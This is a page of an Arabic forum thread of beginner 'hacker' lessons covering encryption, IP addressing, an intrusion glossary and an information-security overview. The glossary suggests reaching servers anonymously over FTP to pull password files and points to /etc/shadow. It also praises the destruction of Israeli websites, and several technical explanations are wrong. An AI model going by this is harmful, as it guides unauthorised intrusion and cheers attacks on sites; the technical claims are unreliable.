منتدي العفريت ::: ElaFreeT.Tk
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتدي العفريت ::: ElaFreeT.Tk

موقع العفريت بتاع كله اغاني و فيديو و افلام و برامج و العاب و الخ ...
 
الرئيسيةالبوابةأحدث الصورالتسجيلدخول

 

 كيف تصبح هاكر محترف ... دروس من الالف الى الياء ...

اذهب الى الأسفل 
انتقل الى الصفحة : الصفحة السابقة  1, 2
كاتب الموضوعرسالة
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس السادس والعشرين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:07 am


الدرس السادس والعشرين


كل ما تود معرفته عن التشـفير
التشفير



هي عملية الحفاظ على سرية المعلومات (الثابت منها و المتحرك) باستخدام برامج لها القدرة على تحويل وترجمة تلك المعلومات الى رموز بحيث إذا ما تم الوصول إليها من قبل أشخاص غير مخول لهم بذلك لا يستطيعون فهم أي شئ لأن ما يظهر لهم هو خليط من الرموز والأرقام و الحروف الغير مفهومة


ولقد شهدت أسواق هذه البرامج انتعاشا مذهلا بعد أن سمحت السلطات الأمريكية للشركات التجارية المتخصصة ببيع هذه التقنية للجمهور و عامة الناس بعدما كانت محصورة للاستخدامات العسكرية والحكومية لسنوات طويلة ولقد اتخذت الحكومة الأمريكية هذا القرار في سبيل دعم الجانب الأمني لمجال التجارة الإلكترونية علما بأنها وحتى وقت قريب جدا لم تسمح بتصدير هذه التكنولوجيا إلى خارج الولايات المتحدة، خاصة للتي تزيد قوة تشفيرها عن 56 بت


هل أنت بحاجة لها؟
الجواب بالتأكيد نعم فلكل فرد و شركة أو هيئه تجارية خصوصيات و أسرار و معلومات هامة جدا لا يجب أن يطلع عليها أحد ، كما أنك اليوم لا تستطيع الاستغناء عن خدمات متوفرة في الإنترنت مثل البريد الإلكتروني و التسوق عبر مواقع التجارة الإلكترونية



فكرة عامة و مبسطة عن التشفير



على اختلاف أنواع و أشكال البرامج المتخصصة في هذا المجال إلا أنها جميعا تتشارك في القاعدة أو الأساس وهي مبنية على مفهوم بسيط جدا وهو أن كل رقم أو معلومة مشفرة تحتاج لفكها و إعادتها الى وضعها الأصلي الى ثلاث عناصر مجتمعة مع بعضها البعض و لنفرض انها ( س ، ص ، ع) أما في حالة معرفة قيمة واحدة فقط من هذه العناصر و بقاء الاثنتين الباقيتين مجهولتين فإنك سوف تجد نفسك في دوامة الاحتمالات والتخمين للوصول إلى القيم الصحيحة لهذين العنصرين المجهولين اللازمين لاكمال الحلقة و فك الشفرة وعلى هذا الأساس علينا التعرف على ثلاث مصطلحات لفهم هذه التكنولوجيا : المفتاح العام ، المفتاح الخاص ، و الرقم الأساس حيث أن أي معلومة يتم تشفيرها لا يمكن الاطلاع عليها صحيحة وكاملة إلا بوجود هذه المفاتيح الثلاثة مجتمعة


ويتم تطبيق هذا المبدأ في مجال التشفير كالتالى


يتم إصدار رقم الأساس عن طريق البرنامج المتخصص أو احد الهيئات المستقلة و المتخصصة في إصدار هذه الأرقام وهو مايعرف ب
(CA) Certificate Authority
بحيث يكون لكل مستخدم رقم أساس وهو (ع) و يتم تقسيم هذا الرقم الى مجموعتين (س) و هو ما يعرف بالمفتاح العام و (ص) هو ما يعرف بالمفتاح الخاص ، بحيث اذا قمنا بعملية ضرب س في ص يكون الناتح هو (ع) الرقم الأساس وهو الرقم اللازم لإعادة الملفات و المعلومات الى وضعها الأصلي قبل التشفير وطبعا هذا الرقم محمي ومشفر بقوة ولا يمكن الوصول اليه


المفتاح العام(Public Key)
هو الرقم الذي يتم تداولة و نشره بين بقية المستخدمين لتشفير أي معلومات أو رسالة الكترونية مخصصة لك و يعتبر رقمك العام اساس عملية التشفير و لا يستطيع أحد فك رموز تلك المعلومة غيرك انت لأنها تحتاج الى الرقم السري و ليكن هو المفتاح الخاص بك لإكمال العملية الحسابية والوصول الى الرقم الأساس وبالتالي فتح الملفات مرة أخرى
المفتاح الخاص : هو النصف الاَخر المكمل للمفتاح العام للوصول الى الرقم الأساس واعادة المعلومات المشفرة الى وضعها الطبيعي قبل التشفير ، و هذا المفتاح هو الذي يميز كل شخص عن غيره من المستخدمين ويكون بمثابة هوية الكترونية تمكن صاحبها من فك أي معلومة مشفرة مرسله اليه على أساس رقمه العام ولذلك يجب عليك الاحتفاظ بالمفتاح الخاص سرا وهذ ما يعرف ب
Private Key


و بهذه الطريقة لا يستطيع أحد فك الشفرات وقراءة المعلومات المحمية بهذه الطريقة دون اكتمال الحلقة و التي لا تتم إلا بمعرفة القيمة الصحيحة للمفتاح العام و المفتاح الخاص



أنواع تكنولوجيا التشفير



هنالك نوعين من التكنولوجيا المستخدمة في التشفير وهي التشفير المتناظر والتشفير الغير متناظر
Symmetric Algorithms and ASymmetric Algorithms
و الفرق بينهم بسيط جدا ولكنه مهم جدا في مستوى ودرجة الأمن حيث أن التشفير المتناظر يتم بتشفير الرسالة أو المعلومات باستخدام الرقم العام وكذلك في نفس الوقت يتم فك الشفرة و ترجمة المعلومات إلى وضعها الأصلي بإستخدام نفس الرقم العام. ولذلك لو حصل و أن شخص اخر يعرف هذا الرقم أو حصل عليه من الدليل العام فإنه قادر على فك الشفرة و قراءة تلك الرسالة أو المعلومة ، أما إذا ما تم تشفير المعلومات باسلوب (الغير متناظر) فإن المعلومات يتم تشفيرها بالرقم العام ولكن لا يمكن فك الشفرة و الوصول إلى تلك المعلومات الا بالمفتاح الخاص لصاحب ذلك المفتاح العام الذي تم على أساسه عملية التشفير
وإذا حصل وأنك فرغت من قراءة السطور السابقة و لم تفهم شئ مما كتبناه فاسمحوا لنا بشرحها بطريقة أخرى للتسهيل ، تخيل بأنك تقوم بالاتصال هاتفيا بأحد أصدقاؤك وعندما تدخل رقم هاتفه (الرقم العام) ويبدأ هاتفه بالرنين ولكن ذلك الصديق لا يرد على مكالمتك فيرد عليك جهاز إجابة و تترك له رسالة صوتية في ذلك الجهاز . و الان لنتخيل بأنك قمت بحماية (تشفير) تلك الرسالة برقم سري و لا يستطيع أحد الاستماع إلى تلك الرسالة إلا بإدخال ذلك الرقم السري. فإن كان صديقك هذا قد اتفق معك على اختيار الرقم السري هو نفس رقم هاتفك العام فهذا ما يسمى بطريقة التشفير المتناظر لأن المفتاح العام = الرقم السري أما لو قام ذلك الصديق ببرمجة التشفير لطلب الرقم السري الخاص بك (رقم اخر لا يعرفه أحد غيرك) فهذا مايعرف بالتشفير الغير متناظر لأن المفتاح العام لا يساوي الرقم السري


أشهر طرق التشفير المتناظر
Blowfish, Digital Encryption Standard (DES), Tiny Encryption Algorithm(TEA), Triple DES, and International Data Encryption.
أشهر طرق التشفير الغير متناظر
Pretty Good Privacy(PGP) and Reivest,shamir&Aselman(RSA)



قوة التشفير


تعتمد على عدد الخانات المكونة لكل رقم و تقاس ب البت فمثلا اذا كان الرقم مكون من 40 خانة فإن القوة ستكون 40 بت إذا كان الرقم عبارة عن 56 خانة تكون قوة التشفير 56 بت وهكذا. علما بأن التكنولوجيا المتوفرة في هذا المجال يمكن أن توفر قوة تشفير تصل إلى أكثر من 3000 بت ولكن لم تسمح الحكومة الأمريكية حتى الان بتداول قوة تشفير أكثر من 128 بت لأنه كاف جدا لحماية التجارة الإلكترونية و جدير بالذكر أن الوقت اللازم ليتمكن أحد لصوص الإنترنت لفك شفرة بقوة 56 بت هو 22 ساعة و خمسة عشر دقيقة ، أما الوقت اللازم لفك شفرة بقوة 128 بت باستخدام التكنولوجيا الحالية لفك الشفرات فهو 2 ترليون سنة!! لأن اللص في حالة 56 بت بحاجة لتجربة 72 كوادرليون من الإحتمالات (يعني رقم و أمامه 15 صفر) أما في قوة 128 فإن الإحتمالات المطلوبة للتجربة تصل الى عدد فلكي وهو 340 انديسليون (يعني رقم وأمامه 36 صفر) ولذلك لم نسمع أبدا بأن معلومة تم تشفيرها بهذه القوة قد تم فكها من قبل هؤلاء اللصوص المحترفين و نحن لا نعتقد بأن أحد يمكنه فعل ذلك على الأقل في المستقبل القريب أو المنظور ولذلك تسوق على شبكة الإنترنت وأنت مطمئن البال بشرط التأكد من قوة التشفير المستخدمة من قبل الموقع الذي تود الشراء منه و كذلك التأكد من قوة التشفير في متصفحك ولمزيد من المعلومات نرجوا مراجعة صفحة الأمن لكي تتعرف على قوة التشفير في متصفحك و مقالة أمن التجارة الإلكترونية حيث نتطرق الى موضوع
SSL (Secure Sockets Layer Technology)
تكنولوجيا الفتحات الاَمنه متعددة الطبقات
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس السابع والعشرين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:09 am


الدرس السابع والعشرين


تعرف على عنوان بروتوكول الإنترنت
Understanding IP Addresses
إذا كنت تملك جهاز هاتف به خاصية الإتصال السريع أو هاتف جوال بخاصية حفظ الأسماء والأرقام فإنك قد فهمت ما أود الكتابة عنه اليوم ! هل فكرت يوما أن تفهم ماهو عنوان بروتوكول الإنترنت الخاص بك ؟ لا عليك فالحكاية سهله جدا وهذا البروتوكول مبني على حقيقة واقعية و هي أننا نستطيع التعامل مع الأسماء ونستطيع تذكرها أكثر من حفظ و تذكر الأرقام خاصة إذا كانت الأرقام طويلة ويصعب تذكرها ولذلك فنحن نلجأ الى تخزين الأسماء في أجهزة الهاتف بدلا من حفظ الأرقام ! ولكنك قد تتساءل مادخل هذه بتلك ؟ وحتى تستطيع فهم الموضوع لابد لنا من ذكر الخلفية التاريخية لها


قام المسؤولون عن تطوير شبكة الإنترنت منذ بداية الستينات (أي منذ أن كانت الشبكة مقتصرة على بعض مراكز البحث العلمي التابعة للجامعات الأمريكية ووزارة الدفاع الأمريكية) بالإستفادة من نظام الهاتف في اعتماد طريقةالترقيم في تمييز كل مستخدم وتحديد البلد والمدينة والمنطقة التى يتصل منها والعكس صحيح أي انك لو تعرف اسم الشخص تستطيع الحصول على رقمه الهاتفي بالإتصال على دليل الإستعلامات ، و نتيجة لإعتماد انظمة الهاتف على هذه الطريقة أصبح يسهل إرسال وإستقبال المكالمات من أو الى ذلك الجهاز او المشترك في خدمة الهاتف. و في مجال الإنترنت فلقد تم الإعتماد على نفس طريقة الترقيم في خدمة الهاتف حتى يتم تمييز أي جهاز في الدنيا مرتبط بشبكة الإنترنت وبذلك تسهل عملية إرسال أو إستقبال المعلومات منه و يتمكن الناس من تمييز كل مستخدم للإنترنت بمعرفة عنوان الأي بي الخاص به ولذلك يمكن تشبيهه عنوان الأي بي برقم الهاتف. و في مجال الإنترنت اذا ما تم معرفة عنوان بروتوكول الإنترنت (الأي بي) يمكن الوصول الى اسم صاحب ذلك العنوان ، ولكي يمكن تطبيق هذا الشئ كان لا بد لهم من الوصول الى نظام موحد للشبكة يمكنهم من تطبيق هذا النظام على الإنترنت على
أولا : أن يكون لهذا النظام الموحد قدرة على ازالة الحواجز الناتجة عن الإختلافات في مواصفات واشكال و أنواع أجهزة الكمبيوتر المرتبطة مع بعضها البعض بواسطة الشبكة
ثانيا : عدم تأثر هذا النظام بالتطورات التي تطرأ على التكنولوجيا المرتبطة بصناعة أجهزة الحاسب
ثالثا : أن يقوم هذا النظام بإرسال و إستقبال المعلومات على شكل حزم صغيرة من المعلومات تكون قادرة على حرية التنقل والحركة من عقدة الى اخرى في الشبكة دون الإعتماد على الإتصال المفتوح و الدائم بين جهازين كما هو الحال في الهاتف وهذ المطلب كان لأسباب عسكرية وتلبية لخاصية عدم الإعتماد على خط تنقل واحد للمعلومات تفاديا لإنقطاع خدمة تراسل المعلومات في حال
وجود دمار أو خلل على احد فروع الشبكة
وعلى هذه الخلفية تم تطوير نظامين وهما المعروفين ب
(TCP) Transmission Control Protocol and (IP) Internet protocol

TCP


و مهمة هذا البروتوكول هوالتأكد من أن حزمة المعلومات التي أرسلت من نقطة (عقدة) الى أخرى قد وصلت كاملة أم لا وكذلك يقوم هذا البروتوكول بتنبيه الجهاز المرسل في حالة تعثر وصول المعلومة الى وجهتها المطلوبة
IP


و هو نظام التوجيه وهي مسؤولة عن تحديد العقد و المسارات التي تسلكها حزم المعلومات للوصول الى الجهاز الهدف

ولقد قام المطورون بعد ذلك بتطوير هذين النظامين و دمجهما مع بعض لتتماشى مع مجموعة من المواصفات الجديدة لتقوم بتقسيم حزم المعلومات الى حزم أصغر و هو ما يعرف ب
FRAMES
للتقليل من اختناقات الشبكة قاموا بتسمية البروتوكول
TCP/IP

ماذا خلف تلك الأسماء؟


سنحاول في هذه المقالة ان نبسط المسألة على قدر المستطاع ونحاول بقدر المستطاع تجنب الحسابات خاصة بين الأنظمة العددية
في الحقيقة ان كل اسم موقع أو اسم مقدم خدمة أو اسم مستخدم مشترك في الإنترنت هو في الواقع عبارة عن مجموعة من الارقام الثنائية (صفر و واحد) و يتكون عنوان بروتوكول الإنترنت من 32 خانة من الأرقام الثنائية وهو ما يعبر عنه ب 32 بت ، وإذا علمنا ان كل 8 بت تكون لنا ما بعرف بالبايت وهي التي تمثل لنا الحروف و الأرقام ، أي كل بايت يمكن أن يمثل حرف هجائي واحد أو أي عدد مكون من الارقام من صفر الى تسعة(النظام العشري) ولقد قام المطورون لشبكة الإنترنت بإعتماد الأرقام من صفر الى مائتين وخمس و خمسين 255 وعلى هذا الأساس فإنه يمكن لنا قسمة 32 بت على ثمانية و يكون الناتج هو 4 بايت أي أنهم وبإختصار شديد وضعوا أساس هذه الأرقام على أساس أربعة حقول من الأرقام تفصل بينهم نقطة و هذه الأرقام تتراوح مابين العدد صفر و 255 و مثال على ذلك نكتب لكم هذا الرقم كنموذج
208.148.28.60
63.209.3.102
فإذا قمت الان بكتابة رسالة الكترونية ووضعت عنوان صديقك أو طلبت زيارة موقع على الشبكة وذلك بكتابة اسم الموقع يقوم المتصفح لديك بإرسال هذا الطلب على شكل حزمة من المعلومات( وبها عنوان بروتوكول الإنترنت الخاص بك) مباشرة الى أحد أجهزة مقدم الخدمة لك و من ثم الى شبكة الإنترنت و حينها يقوم الخادم الخاص لإسم النطاق
DOMIAN NAME SERVER
بترجمة ما قمت بطباعته كإسم الموقع أو عنوان صديقك البريدي الى الرقم الثنائي الأساسي و بالتالي يرسل تلك المعلومة أو الطلب

أنواع و فئات العناوين


لا نود الدخول في تفاصيل هذه الأنواع و الغوص في اعماقها ولكن نكتفي بلمحة بسيطة عنها
تنقسم عناوين بروتوكول الإنترنت الى ثلاث أقسام و يتفرع من كل منها عدة اقسام اخرى ونكتفي بذكر المهم منها بإختصار شديد و هي

Class based addressing العناوين المعتمدة على التصنيف
وهي ثلاث فئات ، كلها تعتمد على نفس الأساس وهو اثنين وثلاثين بت منقسمة الى اربعة مجموعات من الأرقام العشرية وتفصل بينهم نقطة ولكن تختلف هذه الفئات في طريقة استخدام الأرقام العشرية

الفئة الأولى : وهي مخصصة للشركات الكبيرة و في هذه الفئة يتم استخدام أول مجموعة من الارقام لتحديد هوية الشبكة و اخر ثلاث ارقام لتحديد هوية المستضيف و تم تخصيص الأرقام من
000.000.000.000 -to- 127.255.255.255
لهذه الفئة مما يؤدي الى امكانية الحصول على 16777216 عنوان مختلف من هذه الفئة

الفئة الثانية : وهي مخصصة للشركات والهيئات المتوسطه و في هذه الفئة يتم استخدام أول مجموعتين من الأرقام لتعريف الشبكة و اخر مجموعتين من الأرقام لتحديد هوية المستضيف و تم تخصيص الأرقام من
128.000.000.000 -TO- 191.255.255.255
لهذه الفئة مما يؤدي الى امكانية الحصول على 65537 عنوان مختلف

الفئة الثالثة : و هي مخصصة للشركات الصغيرة و في هذه الفئة يتم استخدام أول ثلاث مجموعات من الأرقام لتحديد هوية الشبكة و اخر مجموعة ارقام لتحديد هوية المستضيف و تم تخصيص الأرقام من
192.000.000.000 -TO- 223.255.255.255
لهذه الفئة مما يؤدي الى امكانية الحصول على 256 عنوان مختلف
وهناك فئتين (رابعة وخامسة) ولكن ليست منتشرة و مازالت تحت التطوير

Subnettingالتفريع الشبكي
و هي مخصصة للشركات الصغيرة جدا و يتم فيها مشاركة عدة شركات و تقاسمها لنفس الشبكة وبذلك تتشارك عدة شبكات صغيرة في عنوان شبكة واحدة من الفئة الثالثة على ان يتم تخصيص أحد الثلاث مجموعات الرقمية الأولى لواحدة من تلك الشركات المشاركة

Classless Interdomain Routingالعناوين دون التصنف
و هي مخصصة لكبار مزودي الخدمة وهو ما يعرف ب
SUPER NETTING
و تعتمد هذه الطريقة على استخدام مئات من العناوين من الفئة الثالثة و تكوين خليط من الأرقام المرتبطة مع بعضها منطقيا و هو ما يعرف بطريقة
(Variable Length Subnetting)
وهي لا تختلف عن الفئات السابقة سوى في وجود علامة (/) بعد العنوان الأصلي و يليها رقم يرمز الى هوية الشبكة
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس الثامن والعشرون   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:09 am

الدرس الثامن والعشرون
مصطلحات مهمة للمبتدئين في تعلم اختراق المواقع
لقد اعددت هذا الملف لاخواني المبتدئين في تعلم طرق اختراق المواقع ، فقد
تواجههم بعض الكلمات التي قد تكون غريبة عليهم و التي قد لا يفهمونها ،
و بالتالي تشكل لهم بعض العواقب في مواصلة الفهم و التعلم . فالله الموفق.
================================================== =====================


تلنت (Telnet):- و هو برنامج صغير موجود في الويندوز . و هو يعمل ككلاينت
أو وضعيته تكون دائما كزبون . أي أن باستطاعة هذا البرنامج الإتصال بالسيرفر
أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز
غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر
عبر بورت معين و خصوصا بورت الإف تي بي (21) للدخول الى الموقع بطريقة خفية
Anonymous Mode لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات.
لاستخدام البرنامج ، اذهب الى Start ==> Run ==> telnet و ستظهر شاشة التلنت.
------------------------------------------------------------------------

برامج السكان أو Scanner:- و هي برامج موجودة للمسح على المواقع و كشف
ثغراتهاإن وجدت ، فهي سريعة، كما أنها تملك قاعدة بيانات واسعة و كبيرة
تحتوي على الثغرات أو الاكسبلويت (Exploits) التي يتم تطبيقها على الموقع
لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم لا . و من أمثلة
هذه البرامج، برنامج Shadow Security Scanner و Stealth و Omran Fast
Scanner ، الخ .
و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر
معين مثل البرامج المختصة بالسكان على سيرفرات الـ IIS و منها برامج المسح
على ثغرات السي جي اي فقط CGI و ما الى ذلك .
-----------------------------------------------------------------------

اكسبلويت (Exploits):- هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان
URL ، تقوم هذه الإكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى
السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين
في السيرفر لعمل كراش له ، و هذا ما يسمى بـ Buffer Over Flow Exploits .
هناك أنواع من الإكسبلويت ، فمنها ال CGI Exploits أو ال CGI Bugs و منها
ال Unicodes Exploits و منها ال ، Buffer Over Flow Exploits ، و منها
ال PHP Exploits ،و منها الDOS Exploits و التي تقوم بعملية حجب الخدمة
للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر
أي فايروول Fire Wall . و هناك بعض الإكسبلويتات المكتوبة بلغة السي و يكون
امتدادها (.c) .
هذه الإكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها
أي الاكسبلويت الى اكسبلويت تنفيذي عادي يستخدم من خلال المتصفح ، و لتحويل
الإكسبلويت المكتبو بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى
نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل
ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولات ) برنامج اسمه
Borland C++ Compiler و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا.
----------------------------------------------------------------------

الجدار الناري FireWall:- هي برامج تستعملها السيرفرات لحمايتها من الولوج
الغير شرعي لنظام ملفاتها من قبل المتطفلين . هي تمثل الحماية للسيرفر طبعا ،
و لكني أنوه بأن الفايروولات المستخدمة لحماية السيرفرات ( المواقع ) تختلف
عن تلك التي تستخدم لحماية الأجهزة .
----------------------------------------------------------------------

Token:- هو ملف الباسورد المظلل (Shadowed Passwd) و الذي يكون فيه الباسورد
على شكل * أو x أي Shadowed . إن وجدت ملف الباسورد مظللا ، فيجب عليك حينها
البحث عن ملف الباسورد الغير المظلل و الذي يسمى Shadow file . تجده في
/etc/shadow .
----------------------------------------------------------------------

Anonymouse:- هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد
اختراقه. هناك خاصية في برامج الاف تي بي بنفس الإسم ، تستطيع ان تستعملها
في الدخول المجهول الى السيرفر و سحب الملفات منه .
----------------------------------------------------------------------

Valnerableties:- أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب
و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى
استغلالها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره .
ما هي مفردها ؟ ، Valnerable أي ثغرة أو بالأصح موضع الضعف و المكان
الغير مؤمن بشكل سليم . و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة
بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع
Security Focus أو بوق تراك او غيرها .
----------------------------------------------------------------------

passwd file : هو الملف الذي يحتوي على باسورد الروت و باسوردات الأشخاص
المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا.
----------------------------------------------------------------------

الجذر أو الـ root : و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلاحيات
في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.
غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن
نظام التشغيل لينوكس او يونكس و سولاري و فري بي اس دي و غيرها .
----------------------------------------------------------------------

السيرفر Server: هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه
فهو جهاز كمبيوتر عاد كغيره من الأجهزة لكنه ذو امكانيات عالية ككبر حجم القرص
الصلب و سرعته الهائلة ، و هو متصل بالإنترنت 24 ساعة ، و هذا هو سبب كون
المواقع شغالة 24 على الإنترنت . قد يملك و يستضيف السيرفر أكثر من موقع
واحد، و هذا يعتمد من سيرفر لآخر و من شركة لأخرى. ضربة الهاكرز طبعا هي اختراق
السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي
تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو
سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع
الإسرائيلية و بكثرة و لله الحمد . - جزاكم الله خيرا أيها المجاهدون - .
-----------------------------------------------------------------------

بوفر أوفر فلو ( Buffer over Flow ) : و هي نوع من أنواع الاكسبلويتات التي
تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الإف تي بي
أو غيره لأجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و لالغاء الرقعة
الموجودة بها كي يتم استغلالها مجددا - بعد عمل الكراش لها طبعا - يتم استغلالها
في معاودة الإتصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها .
و هي شبيهة نوعا ما بعملية حجب الخدمة - DOS - اذ أنها تقوم بعملية اوفر لود على
جزء مركز من السيرفر .
------------------------------------------------------------------------
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس التاسع والعشرون   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:11 am


الدرس التاسع والعشرون
أمن المعلومات ضرورة أم ترف







يشكل أمن المعلومات في الوقت الراهن حجر الزاوية فى نهضة تكنولوجيا المعلومات والاتصالات ... فمن المعروف أن المسافة المتاحة للخصوصية تتناسب عكسيا مع التقدم التكنولوجى لأدوات المعلوماتية والاتصالات.. لذا, فإنه من المفترض أن بناء تكنولوجيا وطنية لأمن المعلومات والاتصالات قد يسمح بعضوية دائمة فى مجلس الأمن التكنولوجى! ...وللتبسيط نتناول هذه الأسئلة:


ما هو الأمن?
حماية أصول وموارد نظام ما بطرق مشروعة, كذلك هو أداة تنظيم العلاقات والاتصالات داخل النظام دون أن يؤثر على قدرة مستخدمي النظام على الأداء. وهو لا يمنع الجريمة أو الاختراق نهائيا, ولكن كلما كان النظام الأمني قوىا ودقيقا كان الاختراق والجريمة في أحد الصور الآتية:
1- مكلفة, بمعنى أن تكون تكاليف الاقتحام أو الاختراق باهظة .
2- تحتاج إلى وقت طويل يمكن خلاله اكتشاف المخترق. 3- تحتاج إلى وقت طويل مما سهل اكتشافها





ما هى أنواع الشبكات التي قد تحتاج إلى تأمين?

الشبكات الداخلية: محلية مثل LAN
الشبكات الخارجية: دولية مثل WAN
الشبكات الخاصة: مغلقة مثل Intranet

هل هناك أنواع أخرى من الأمن?
أولا: أمن المعلومات: Information Security
1- المعلومات
2- أمن مخازن المعلومات

ثانيا: أمن الوصول إلى الأنظمة :Access Control
1- التحكم في الدخول
2- التحكم في عدة مستويات
3- التحكم فى التطبيقات

ثالثا: أمن البرمجيات Software Security
1- تأمين ضد القرصنة للبرمجيات
2- التأمين ضد السطو على قواعد البيانات
3- التأمين لأهداف قومية

رابعا: أمن الاتصالات Communications Security
أ- السلكي:
1- الخطوط التليفونية
2- خطوط وكوابل النقل
3- أجهزة النقل
4- محطة الاتصالات

ب- اللاسلكي:
1- المستقل
2- الملحق بأجهزة أخرى

ما هى التهديدات التي تواجه المستخدم?
* التهديدات الرقمية:
1- الفيروس: هو أداة إفساد وإضرار.
2- الدودة: وهى أداة تعطيل فقط.
3- حصان طروادة: وهو أداة للإضرار والسيطرة على المعلومات.

* الاختراق:
1- اختراق المعلومات الثابتة.
2- اختراق المعلومات المتحركة أو المنقولة.

ما هي أغراض الاختراق?
1- اللهو.
2- التعطيل.
3- التخريب والتدمير.
4- التجسس (والحصول على الأكواد والشفرات)
5- السطو على الأموال.

ما هي الجريمة الإلكترونية ?
هي جريمة القرن الجديد المسايرة للتطور الهائل في تكنولوجيا المعلومات والاتصالات, حيث تعتبر شبكة الإنترنت هي أكبر شبكة في تاريخ البشرية وهى أحدث أدوات العالم لربط أكثر من 500 مليون جهاز كمبيوتر في أكثر من 200 دولة ويستخدمها أكثر من مليار مشترك والجريمة الإلكترونية هي صراع بين التقدم التكنولوجي وحماية وأمن الخصوصية. حيث لم تعد الآن عملية سرقة مصرف تجارى تتطلب أسلحة ولكن تحتاج إلى معرفة بالتقنية الحديثة والشبكات الإلكترونية والشفرات وأنظمة التحويل المالي.
والجريمة الإلكترونية تبدأ من عمليات الاقتناص لأرقام الحسابات, وبطاقات الائتمان, إلى التخريب في المواقع, ونشر الصور الإباحية, والمواقع الكاذبة, وغسيل الأموال, والتجسس . الخ.

ما هو حجم الجريمة الإلكترونية?
يقال أن السرقات السنوية وصلت إلى أكثر من مليوني حالة بالإضافة إلى مئات الآلاف من الشركات التي وقعت ضحية القراصنة والمتلصصين, وذلك بسبب الخلل وعدم الأحكام في وسائل الأمن لدى المواقع الإلكترونية والتي يجب سدها في أسرع وقت,حيث أنه من المتوقع أن تتضاعف هذه الأرقام.

هل هناك أمثلة ونماذج للجريمة الإلكترونية?
مصر: اك تشفت عملية ابتزاز عن طريق الإنترنت بتهديد المسئولين بإحدى الشركات المنتجة للمياه الغازية بطلب مبلغ من المال مقابل عدم نشر صورة زجاجة بها صرصار, ادعاء أنها من إنتاج الشركة وبالفعل نفذ التهديد وشاهد الصورة حوالي 3700 مشاهد وتم ضبطه واعترف بالواقعة.
كذلك كشف تقرير من بنك إلى النيابة العامة عن حادث سرقة أرصدة رجل أعمال مصري عن طريق الفيزا كارت الخاصة بالبنك وقد أكدت التحريات أن مرتكبي الحادث اشتريا بضائع أمريكية عبارة عن ملابس تقدر بحوالي 12 ألف دولار.
